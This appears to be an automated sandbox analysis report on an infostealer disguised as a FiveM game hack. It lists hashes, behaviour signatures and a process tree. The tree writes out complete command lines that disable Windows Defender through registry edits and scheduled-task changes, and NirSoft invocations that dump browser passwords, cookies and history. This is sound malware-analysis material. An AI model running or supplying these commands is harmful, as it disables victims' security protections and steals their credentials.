Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-en-20211104 -
submitted
03-12-2021 18:08
Static task
static1
Behavioral task
behavioral1
Sample
LOAD FIVEM HACK.exe
Resource
win7-en-20211104
General
-
Target
LOAD FIVEM HACK.exe
-
Size
19.1MB
-
MD5
41cc3c19dac08d2c7365d897d396733e
-
SHA1
7eb01e9812ce1cea266ad43c4dce589ec8495818
-
SHA256
80cf0f9c2763be12d717c88bc1a22b94d93e5c9055fb8d6ce2e9fe58a2bd9e23
-
SHA512
479bc22aae5c78007d6b4683ff2dfa5456685ae687b5a0b3ff1668b1baa1769c94495ed00ad44a6f9649fca4ec3f5a5e299600826dc331decd57e03ea08f0eb6
Malware Config
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
NirSoft WebBrowserPassView 3 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral1/memory/852-75-0x000000001B360000-0x000000001B69B000-memory.dmp WebBrowserPassView C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe WebBrowserPassView C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe WebBrowserPassView -
Nirsoft 9 IoCs
Processes:
resource yara_rule behavioral1/memory/852-75-0x000000001B360000-0x000000001B69B000-memory.dmp Nirsoft C:\Users\Admin\AppData\Local\Temp\bfsvc.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\bfsvc.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\hh.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\hh.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\xwizard.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\xwizard.exe Nirsoft -
Executes dropped EXE 9 IoCs
Processes:
LoaderPB.exePROPB.exeRtkBtManServ.exebfsvc.exesnuvcdsm.exewinhlp32.exesplwow64.exehh.exexwizard.exepid process 1808 LoaderPB.exe 484 PROPB.exe 852 RtkBtManServ.exe 876 bfsvc.exe 1164 snuvcdsm.exe 240 winhlp32.exe 912 splwow64.exe 1116 hh.exe 928 xwizard.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\winhlp32.exe upx C:\Users\Admin\AppData\Local\Temp\splwow64.exe upx C:\Users\Admin\AppData\Local\Temp\winhlp32.exe upx C:\Users\Admin\AppData\Local\Temp\splwow64.exe upx -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\LoaderPB.exe vmprotect -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
PROPB.exeLOAD FIVEM HACK.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion PROPB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion PROPB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LOAD FIVEM HACK.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LOAD FIVEM HACK.exe -
Drops startup file 2 IoCs
Processes:
PROPB.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager1685878.exe PROPB.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager1685878.exe PROPB.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
PROPB.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-103686315-404690609-2047157615-1000\Software\Wine PROPB.exe -
Loads dropped DLL 1 IoCs
Processes:
PROPB.exepid process 484 PROPB.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
RtkBtManServ.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 RtkBtManServ.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e RtkBtManServ.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e RtkBtManServ.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 6 IoCs
Processes:
bfsvc.exesnuvcdsm.exewinhlp32.exesplwow64.exehh.exexwizard.exepid process 876 bfsvc.exe 1164 snuvcdsm.exe 240 winhlp32.exe 912 splwow64.exe 1116 hh.exe 928 xwizard.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
choice.exehh.exexwizard.exepid process 1164 choice.exe 1116 hh.exe 928 xwizard.exe 928 xwizard.exe 928 xwizard.exe 928 xwizard.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
RtkBtManServ.exedescription pid process Token: SeDebugPrivilege 852 RtkBtManServ.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
LOAD FIVEM HACK.exePROPB.execmd.exedescription pid process target process PID 660 wrote to memory of 1808 660 LOAD FIVEM HACK.exe LoaderPB.exe PID 660 wrote to memory of 1808 660 LOAD FIVEM HACK.exe LoaderPB.exe PID 660 wrote to memory of 1808 660 LOAD FIVEM HACK.exe LoaderPB.exe PID 660 wrote to memory of 1808 660 LOAD FIVEM HACK.exe LoaderPB.exe PID 660 wrote to memory of 484 660 LOAD FIVEM HACK.exe PROPB.exe PID 660 wrote to memory of 484 660 LOAD FIVEM HACK.exe PROPB.exe PID 660 wrote to memory of 484 660 LOAD FIVEM HACK.exe PROPB.exe PID 660 wrote to memory of 484 660 LOAD FIVEM HACK.exe PROPB.exe PID 660 wrote to memory of 484 660 LOAD FIVEM HACK.exe PROPB.exe PID 660 wrote to memory of 484 660 LOAD FIVEM HACK.exe PROPB.exe PID 660 wrote to memory of 484 660 LOAD FIVEM HACK.exe PROPB.exe PID 484 wrote to memory of 852 484 PROPB.exe RtkBtManServ.exe PID 484 wrote to memory of 852 484 PROPB.exe RtkBtManServ.exe PID 484 wrote to memory of 852 484 PROPB.exe RtkBtManServ.exe PID 484 wrote to memory of 852 484 PROPB.exe RtkBtManServ.exe PID 484 wrote to memory of 1336 484 PROPB.exe cmd.exe PID 484 wrote to memory of 1336 484 PROPB.exe cmd.exe PID 484 wrote to memory of 1336 484 PROPB.exe cmd.exe PID 484 wrote to memory of 1336 484 PROPB.exe cmd.exe PID 1336 wrote to memory of 1164 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1164 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1164 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1164 1336 cmd.exe reg.exe PID 1336 wrote to memory of 2000 1336 cmd.exe reg.exe PID 1336 wrote to memory of 2000 1336 cmd.exe reg.exe PID 1336 wrote to memory of 2000 1336 cmd.exe reg.exe PID 1336 wrote to memory of 2000 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1588 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1588 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1588 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1588 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1620 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1620 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1620 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1620 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1608 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1608 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1608 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1608 1336 cmd.exe reg.exe PID 1336 wrote to memory of 812 1336 cmd.exe reg.exe PID 1336 wrote to memory of 812 1336 cmd.exe reg.exe PID 1336 wrote to memory of 812 1336 cmd.exe reg.exe PID 1336 wrote to memory of 812 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1760 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1760 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1760 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1760 1336 cmd.exe reg.exe PID 1336 wrote to memory of 572 1336 cmd.exe reg.exe PID 1336 wrote to memory of 572 1336 cmd.exe reg.exe PID 1336 wrote to memory of 572 1336 cmd.exe reg.exe PID 1336 wrote to memory of 572 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1048 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1048 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1048 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1048 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1504 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1504 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1504 1336 cmd.exe reg.exe PID 1336 wrote to memory of 1504 1336 cmd.exe reg.exe PID 1336 wrote to memory of 304 1336 cmd.exe reg.exe PID 1336 wrote to memory of 304 1336 cmd.exe reg.exe PID 1336 wrote to memory of 304 1336 cmd.exe reg.exe PID 1336 wrote to memory of 304 1336 cmd.exe reg.exe PID 1336 wrote to memory of 764 1336 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\LOAD FIVEM HACK.exe"C:\Users\Admin\AppData\Local\Temp\LOAD FIVEM HACK.exe"1⤵
- Checks BIOS information in registry
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\LoaderPB.exe"C:\Users\Admin\AppData\Local\Temp\LoaderPB.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\PROPB.exe"C:\Users\Admin\AppData\Local\Temp\PROPB.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops startup file
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" 3DdHBGXJtZaBFfP8HsYgGdL3DLw4WBuf00yKjIbZKNfadE6sLb/cRUFHaOYFIeBtVADw9tL897OeyhzYsQzDhjEXrpur+kVXs9v6R3+2AA54RyMOmii4JNry2VkxJu573ECwzUA60IF1MBrkeAAL3hpNH2t65YhsdjnHjdjrEv4=3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵
-
C:\Users\Admin\AppData\Local\Temp\bfsvc.exeC:\Users\Admin\AppData\Local\Temp\bfsvc.exe /capture /Filename "C:\Users\Admin\AppData\Local\Temp\capture.png"6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵
-
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exeC:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵
-
C:\Users\Admin\AppData\Local\Temp\winhlp32.exeC:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Users\Admin\AppData\Local\Temp\splwow64.exeC:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Users\Admin\AppData\Local\Temp\hh.exeC:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵
-
C:\Users\Admin\AppData\Local\Temp\xwizard.exeC:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Admin_History.txtMD5
f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txtMD5
f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Local\Temp\Cookies1MD5
f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Local\Temp\Cookies3MD5
f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Local\Temp\LoaderPB.exeMD5
23dce212dabef70762ddb7ebbcc49c00
SHA1e11f35ef89f107071a91181f99473d398daeba94
SHA256e6534bbd9a832e9010615d63db378cb6a8e2f18675109d8a51d7dcca4636f35e
SHA512fdc80aa23f8f294506b7c28eb711f53aeff68955721f4698147501f5b9945f176813b46ec15bb5d93a3fad012ced43e1e754129698df5131be51e8e7237a152f
-
C:\Users\Admin\AppData\Local\Temp\PROPB.exeMD5
ff4b4df8c7d285240ba48c4bbfcee47c
SHA134a214a2ced15068317c5f3e5d7acd027139568e
SHA2567847fbe81f7b487ed1e8bf2d6022edd22c4e43a4a7756b79fd218ba0d396c462
SHA512792464a8447e712656025e7599d78a50e98388c000e12f5684f7c4b17a466338fa39e614be0a040d3e7d45a87e9babc712059c0abb241a76aa88d42681a8a07c
-
C:\Users\Admin\AppData\Local\Temp\PROPB.exeMD5
ff4b4df8c7d285240ba48c4bbfcee47c
SHA134a214a2ced15068317c5f3e5d7acd027139568e
SHA2567847fbe81f7b487ed1e8bf2d6022edd22c4e43a4a7756b79fd218ba0d396c462
SHA512792464a8447e712656025e7599d78a50e98388c000e12f5684f7c4b17a466338fa39e614be0a040d3e7d45a87e9babc712059c0abb241a76aa88d42681a8a07c
-
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exeMD5
88ab0bb59b0b20816a833ba91c1606d3
SHA172c09b7789a4bac8fee41227d101daed8437edeb
SHA256f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312
SHA51205cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857
-
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exeMD5
88ab0bb59b0b20816a833ba91c1606d3
SHA172c09b7789a4bac8fee41227d101daed8437edeb
SHA256f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312
SHA51205cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857
-
C:\Users\Admin\AppData\Local\Temp\bfsvc.cfgMD5
5242530a2b65089696f3cf8e5ee02ff7
SHA1d604293148cdd953b3368c54920c043cffe9e1c1
SHA256239a1d9844ddbd0e650f8e5de69a2a40067106a79878fa4948a8039f1573b781
SHA5127aafe122d3b7b9d377f689a872c2306c3b04d5a8a7e4df69b65370e48356db416b5cacc6681a1f7315d0ad730fd12b651115a81bd4c880033e5ef89fa605c39a
-
C:\Users\Admin\AppData\Local\Temp\bfsvc.exeMD5
899d3ed011eb58459b8a4fc2b81f0924
SHA180361f1e0b93143ec1ddfee156760f5938c85791
SHA2565e3f311ae67f046b56435067bcdd39fbf836fa0421fbc8c8b0e43e8e47524954
